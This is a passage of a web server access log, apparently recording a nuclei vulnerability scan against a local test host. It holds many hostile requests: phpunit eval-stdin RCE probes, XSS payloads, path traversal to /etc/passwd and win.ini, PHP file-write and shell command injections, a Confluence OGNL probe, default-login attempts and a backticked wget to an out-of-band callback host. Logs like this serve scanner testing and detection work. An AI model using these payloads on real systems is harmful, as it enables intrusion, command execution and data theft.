AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.080","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.238","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.053","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-snapshot?name=..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%22297MbMHBshdgnQ8KhGPPft0Ppu8.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MbMHBshdgnQ8KhGPPft0Ppu8.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"name=ADMIN&pwd=ADMIN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://c9v8hn0smpv8c57g0t003dk5kczk6yzjz.oast.live`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/.gitignore HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"name=admin&pwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /info 